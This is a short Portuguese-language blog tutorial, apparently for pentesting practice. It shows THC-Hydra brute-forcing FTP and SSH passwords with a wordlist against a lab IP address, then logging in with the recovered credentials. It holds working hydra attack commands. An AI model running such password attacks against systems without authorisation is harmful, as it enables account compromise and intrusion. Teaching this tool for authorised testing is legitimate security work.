THC-Hydra — Brute Force Attack FTP e SSH
0
0

THC-Hydra — Brute Force Attack FTP e SSH

Marcos Henrique
0 min
0
0
Email image

O Hydra é uma excelente ferramenta para realização ataques de senhas, os ataques podem ser realizados através de uma lista de palavras “wordlist” contendo uma grande quantidade de usuários e senhas.

Site: www.thc.org/thc-hydra

Veja alguns exemplos básicos de como utilizar o Hydra:

WordList

Crie o arquivo senhas.txt contendo senhas aleatórias que possivelmente possa pertencer a um determinado usuário.

cat senhas.txt

Email image

Ataque ao Servidor FTP

01 — Passo

Execute o comando:

hydra -l 100security -P senhas.txt 10.10.10.123 ftp

-l : Define o login do usuário.
100security : Login do usuário a ser verificado.
-P : Define o arquivo contendo as possíveis senhas “wordlist”.
senhas.txt : Arquivo que contém as possíveis senhas do usuário informado.
10.10.10.123 : IP do servidor FTP.
ftp : Tipo do serviço a ser verificado.

Ao realizar o ataque a senha do usuário informado é revelada caso esta esteja no arquivo senhas.txt.

Login: 100security
Password: P@ssw0rd

Email image

02 — Passo

Para validar os acessos estabeleça a conexão como serviço FTP :

ftp 10.10.10.123

Email image

Ataque ao Servidor SSH

01 — Passo

Execute o comando:

hydra -l 100security -P senhas.txt 10.10.10.123 ssh

Email image

02 — Passo

Para validar os acessos estabeleça a conexão como serviço SSH :

ssh -l 100security 10.10.10.123

Email image

Fonte: https://www.100security.com.br/hydra